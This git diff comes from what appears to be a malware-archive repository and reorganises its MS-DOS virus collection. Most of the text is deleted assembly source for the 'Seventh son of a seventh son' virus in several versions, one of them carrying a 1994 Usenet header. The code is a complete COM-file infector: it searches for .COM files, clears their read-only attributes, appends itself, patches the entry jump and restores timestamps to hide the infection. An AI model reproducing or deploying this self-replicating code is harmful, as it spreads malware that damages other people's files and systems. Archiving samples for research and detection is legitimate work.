diff --git a/MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.7son.asm b/MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.7son.asm deleted file mode 100644 index 9e1c79c2..00000000 --- a/MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.7son.asm +++ /dev/null @@ -1,251 +0,0 @@ -From netcom.com!ix.netcom.com!netnews Tue Nov 29 09:42:48 1994 -Xref: netcom.com alt.comp.virus:506 -Path: netcom.com!ix.netcom.com!netnews -From: Zeppelin@ix.netcom.com (Mr. G) -Newsgroups: alt.comp.virus -Subject: 7th Son Virus -Date: 29 Nov 1994 13:02:59 GMT -Organization: Netcom -Lines: 236 -Distribution: world -Message-ID: <3bf8q3$iaj@ixnews1.ix.netcom.com> -References: -NNTP-Posting-Host: ix-pas2-10.ix.netcom.com - -;*********************************************************************** -***** -;* Seventh son of a seventh son version 4 -;* -;* Compile with MASM 4.0 -;* (other assemblers will probably not produce the same result) -;* -;* Disclaimer: -;* This file is only for educational purposes. The author takes no -;* responsibility for anything anyone does with this file. Do not -;* modify this file! -;*********************************************************************** -***** - -cseg segment - assume cs:cseg,ds:cseg,es:cseg,ss:cseg - - .RADIX 16 - -FILELEN equ end - start -MINTARGET equ 1000d -MAXTARGET equ -(FILELEN+40) - - - -;*********************************************************************** -***** -;* Dummy program (infected) -;*********************************************************************** -***** - - org 100 - -begin: db 4Dh ;virus mark - db 0E9h, 4, 0 ;jump to virus entry - - -;*********************************************************************** -***** -;* Begin of the virus -;*********************************************************************** -***** - -start: db 0CDh, 20h, 0, 0 - - cld - mov si,0100h - push si ;push new IP on stack - mov di,si - add si,[si+2] ;si -> start - - push si ;restore original begin - movsw - movsw - pop si - - mov ax,3300h ;get ctrl-break flag - int 21 - push dx - - cwd ;clear the flag - inc ax - push ax - int 21 - - mov ax,3524h ;get int24 vector - int 21 - push bx - push es - - lea dx,[si+(offset ni24 - 0104)] ;set new int24 -vector - mov ah,25h - push ax - int 21 - - mov ah,2Fh ;get DTA adres - int 21 - push es - push bx - - add dx,070h ;set new DTA adres - mov ah,1Ah - int 21 - add dx,1Eh - push dx - - lea di,[si+(offset generation-0104)] ;check -generation - cmp [di],0707h - jne verder - - lea dx,[di+2] ;7th son of a 7th son! - mov ah,09h - int 21 - -verder: mov ax,[di] ;update generations - xchg ah,al - mov al,1 - mov [di],ax - - lea dx,[di+33d] ;find first COM-file - xor cx,cx - mov ah,4Eh -infloop: int 21 - pop dx - jc stop - - push dx - - xor cx,cx ;clear -read-only-arttribute - mov ax,4301 - int 21 - jc return1 - - mov ax,3D02h ;open the file - int 21 - jc return1 - xchg bx,ax - - mov ax,5700h ;get file date & time - int 21 - push cx - push dx - - mov cx,4 ;read begin of file - mov dx,si - mov ah,3fh - int 21 - - cmp byte ptr [si],4Dh ;already infected or an -EXE? - je return2 - cmp byte ptr [si],5Ah ;or a weird EXE? - je return2 - - mov al,2 ;go to end of file - call seek - - cmp ax,MAXTARGET ;check length of file - jnb return2 - cmp ax,MINTARGET - jbe return2 - - push ax - mov cx,FILELEN ;write program to end of -file - mov ah,40h - int 21 - cmp ax,cx ;are all bytes written? - pop ax - jnz return2 - - xchg ax,bp - mov al,0 ;go to begin of file - call seek - - mov word ptr [si],0E94Dh ;write mark and -jump-command - mov word ptr [si+2],bp - mov ah,40h - int 21 - - inc byte ptr [di] ;number of next son - -return2: pop dx ;restore file date & -time - pop cx - mov ax,5701h - int 21 - - mov ah,3Eh ;close the file - int 21 - -return1: mov ah,4Fh ;find next file - jmp short infloop - -stop: pop dx ;restore DTA adres - pop ds - mov ah,1Ah - int 21 - - pop ax ;restore int24 vector - pop ds - pop dx - int 21 - - pop ax ;restore ctrl-break flag - pop dx - int 21 - - push cs - push cs - pop ds - pop es - - ret - -seek: mov ah,42 - cwd -int21: xor cx,cx - int 21 - mov cl,4 - mov dx,si - ret - - -;*********************************************************************** -***** -;* Interupt handler 24 -;*********************************************************************** -***** - -ni24: mov al,03 - iret - - -;*********************************************************************** -***** -;* Data -;*********************************************************************** -***** - -generation db 1,1 -sontxt db 'Seventh son of a seventh son',0Dh, 0Ah, '$' -filename db '*.COM',0 - db '‚¨°³±' - -end: - -cseg ends - end begin - - - - diff --git a/MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.7son2.asm b/MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.7son2.asm deleted file mode 100644 index 1ca91447..00000000 --- a/MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.7son2.asm +++ /dev/null @@ -1,232 +0,0 @@ -;**************************************************************************** -;* Seventh son of a seventh son version 2 -;**************************************************************************** - -cseg segment - assume cs:cseg,ds:cseg,es:cseg,ss:cseg - -FILELEN equ end - start -MINTARGET equ 1000 -MAXTARGET equ -(FILELEN+40h) - - org 100h - - .RADIX 16 - - -;**************************************************************************** -;* Dummy program (infected) -;**************************************************************************** - -begin: db 4Dh - jmp start - - -;**************************************************************************** -;* Begin of the virus -;**************************************************************************** - -start: call start2 -start2: pop bp - sub bp,0103h - - lea si,[bp+offset begbuf-4] ;restore begin of file - mov di,0100h - movsw - movsw - - mov ax,3300h ;get ctrl-break flag - int 21 - push dx - - xor dl,dl ;clear the flag - mov ax,3301h - int 21 - - mov ax,3524h ;get int24 vector - int 21 - push bx - push es - - mov dx,offset ni24 - 4 ;set new int24 vector - add dx,bp - mov ax,2524h - int 21 - - lea dx,[bp+offset end] ;set new DTA adres - mov ah,1Ah - int 21 - add dx,1Eh - mov word ptr [bp+offset nameptr-4],dx - - lea si,[bp+offset grandfather-4] ;check generation - cmp [si],0606h - jne verder - - lea dx,[bp+offset sontxt-4] ;7th son of a 7th son! - mov ah,09h - int 21 - -verder: mov ax,[si] ;update generations - xchg ah,al - xor al,al - mov [si],ax - - lea dx,[bp+offset filename-4] ;find first COM-file - xor cx,cx - mov ah,4Eh - int 21 - -infloop: mov dx,word ptr [bp+offset nameptr-4] - call infect - - mov ah,4Fh ;find next file - int 21 - jnc infloop - - pop ds ;restore int24 vector - pop dx - mov ax,2524h - int 21 - - pop dx ;restore ctrl-break flag - mov ax,3301h - int 21 - - push cs - push cs - pop ds - pop es - mov ax,0100h ;put old start-adres on stack - push ax - - ret - - -;**************************************************************************** -;* Tries to infect the file (ptr to ASCIIZ-name is DS:DX) -;**************************************************************************** - -infect: cld - - mov ax,4300h ;ask attributes - int 21 - push cx - - xor cx,cx ;clear flags - call setattr - jc return1 - - mov ax,3D02h ;open the file - int 21 - jc return1 - xchg bx,ax - - mov ax,5700h ;get file date & time - int 21 - push cx - push dx - - mov cx,4 ;read begin of file - lea dx,[bp+offset begbuf-4] - mov ah,3fh - int 21 - - mov al,byte ptr [bp+begbuf-4] ;already infected? - cmp al,4Dh - je return2 - cmp al,5Ah ;or a weird EXE? - je return2 - - call endptr ;get file-length - - cmp ax,MAXTARGET ;check length of file - jnb return2 - cmp ax,MINTARGET - jbe return2 - - push ax - mov cx,FILELEN ;write program to end of file - lea dx,[bp+offset start-4] - mov ah,40h - int 21 - cmp ax,cx ;are all bytes written? - pop ax - jnz return2 - - sub ax,4 ;calculate new start-adres - mov word ptr [bp+newbeg-2],ax - - call beginptr ;write new begin of file - mov cx,4 - lea dx,[bp+offset newbeg-4] - mov ah,40h - int 21 - - inc byte ptr [si] ;number of next son - -return2: pop dx ;restore file date & time - pop cx - mov ax,5701h - int 21 - - mov ah,3Eh ;close the file - int 21 - -return1: pop cx ;restore file-attribute -; call setattr - -; ret - - -;**************************************************************************** -;* Changes file-attributes -;**************************************************************************** - -setattr: mov dx,word ptr [bp+offset nameptr-4] - mov ax,4301h - int 21 - ret - - -;**************************************************************************** -;* Subroutines for file-pointer -;**************************************************************************** - -beginptr: mov ax,4200h ;go to begin of file - jmp short ptrvrdr - -endptr: mov ax,4202h ;go to end of file -ptrvrdr: xor cx,cx - xor dx,dx - int 21 - ret - - -;**************************************************************************** -;* Interupt handler 24 -;**************************************************************************** - -ni24: mov al,03 - iret - - -;**************************************************************************** -;* Data -;**************************************************************************** - -begbuf db 0CDh, 20h, 0, 0 -newbeg db 4Dh, 0E9h, 0, 0 -nameptr dw ? -sontxt db 'Seventh son of a seventh son',0Dh, 0Ah, '$' -grandfather db 0 -father db 0 -filename db '*.COM',0 - db '‚¨°³±' - -end: - -cseg ends - end begin - - \ No newline at end of file diff --git a/MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.7son4.asm b/MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.7son4.asm deleted file mode 100644 index 1d83115b..00000000 --- a/MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.7son4.asm +++ /dev/null @@ -1,218 +0,0 @@ -;**************************************************************************** -;* Seventh son of a seventh son version 4 -;* -;* Compile with MASM 4.0 -;* (other assemblers will probably not produce the same result) -;* -;* Disclaimer: -;* This file is only for educational purposes. The author takes no -;* responsibility for anything anyone does with this file. Do not -;* modify this file! -;**************************************************************************** - -cseg segment - assume cs:cseg,ds:cseg,es:cseg,ss:cseg - - .RADIX 16 - -FILELEN equ end - start -MINTARGET equ 1000d -MAXTARGET equ -(FILELEN+40) - - - -;**************************************************************************** -;* Dummy program (infected) -;**************************************************************************** - - org 100 - -begin: db 4Dh ;virus mark - db 0E9h, 4, 0 ;jump to virus entry - - -;**************************************************************************** -;* Begin of the virus -;**************************************************************************** - -start: db 0CDh, 20h, 0, 0 - - cld - mov si,0100h - push si ;push new IP on stack - mov di,si - add si,[si+2] ;si -> start - - push si ;restore original begin - movsw - movsw - pop si - - mov ax,3300h ;get ctrl-break flag - int 21 - push dx - - cwd ;clear the flag - inc ax - push ax - int 21 - - mov ax,3524h ;get int24 vector - int 21 - push bx - push es - - lea dx,[si+(offset ni24 - 0104)] ;set new int24 vector - mov ah,25h - push ax - int 21 - - mov ah,2Fh ;get DTA adres - int 21 - push es - push bx - - add dx,070h ;set new DTA adres - mov ah,1Ah - int 21 - add dx,1Eh - push dx - - lea di,[si+(offset generation-0104)] ;check generation - cmp [di],0707h - jne verder - - lea dx,[di+2] ;7th son of a 7th son! - mov ah,09h - int 21 - -verder: mov ax,[di] ;update generations - xchg ah,al - mov al,1 - mov [di],ax - - lea dx,[di+33d] ;find first COM-file - xor cx,cx - mov ah,4Eh -infloop: int 21 - pop dx - jc stop - - push dx - - xor cx,cx ;clear read-only-arttribute - mov ax,4301 - int 21 - jc return1 - - mov ax,3D02h ;open the file - int 21 - jc return1 - xchg bx,ax - - mov ax,5700h ;get file date & time - int 21 - push cx - push dx - - mov cx,4 ;read begin of file - mov dx,si - mov ah,3fh - int 21 - - cmp byte ptr [si],4Dh ;already infected or an EXE? - je return2 - cmp byte ptr [si],5Ah ;or a weird EXE? - je return2 - - mov al,2 ;go to end of file - call seek - - cmp ax,MAXTARGET ;check length of file - jnb return2 - cmp ax,MINTARGET - jbe return2 - - push ax - mov cx,FILELEN ;write program to end of file - mov ah,40h - int 21 - cmp ax,cx ;are all bytes written? - pop ax - jnz return2 - - xchg ax,bp - mov al,0 ;go to begin of file - call seek - - mov word ptr [si],0E94Dh ;write mark and jump-command - mov word ptr [si+2],bp - mov ah,40h - int 21 - - inc byte ptr [di] ;number of next son - -return2: pop dx ;restore file date & time - pop cx - mov ax,5701h - int 21 - - mov ah,3Eh ;close the file - int 21 - -return1: mov ah,4Fh ;find next file - jmp short infloop - -stop: pop dx ;restore DTA adres - pop ds - mov ah,1Ah - int 21 - - pop ax ;restore int24 vector - pop ds - pop dx - int 21 - - pop ax ;restore ctrl-break flag - pop dx - int 21 - - push cs - push cs - pop ds - pop es - - ret - -seek: mov ah,42 - cwd -int21: xor cx,cx - int 21 - mov cl,4 - mov dx,si - ret - - -;**************************************************************************** -;* Interupt handler 24 -;**************************************************************************** - -ni24: mov al,03 - iret - - -;**************************************************************************** -;* Data -;**************************************************************************** - -generation db 1,1 -sontxt db 'Seventh son of a seventh son',0Dh, 0Ah, '$' -filename db '*.COM',0 - db '‚¨°³±' - -end: - -cseg ends - end begin - - \ No newline at end of file diff --git a/MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.3apa3a.asm b/MSDOS/Virus.MSDOS.3apa3a.asm similarity index 100% rename from MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.3apa3a.asm rename to MSDOS/Virus.MSDOS.3apa3a.asm diff --git a/MSDOS/Virus.MSDOS.7son.7z b/MSDOS/Virus.MSDOS.7son.7z new file mode 100644 index 00000000..c3bdc871 Binary files /dev/null and b/MSDOS/Virus.MSDOS.7son.7z differ diff --git a/MSDOS/0 - 9 Index/Virus.MSDOS.Unknown._468.asm b/MSDOS/Virus.MSDOS.Azagoth.asm similarity index 100% rename from MSDOS/0 - 9 Index/Virus.MSDOS.Unknown._468.asm rename to MSDOS/Virus.MSDOS.Azagoth.asm diff --git a/MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.1st_star.asm b/MSDOS/Virus.MSDOS.First-Star.asm similarity index 100% rename from MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.1st_star.asm rename to MSDOS/Virus.MSDOS.First-Star.asm diff --git a/MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.1stvirus.asm b/MSDOS/Virus.MSDOS.Gogi.asm similarity index 100% rename from MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.1stvirus.asm rename to MSDOS/Virus.MSDOS.Gogi.asm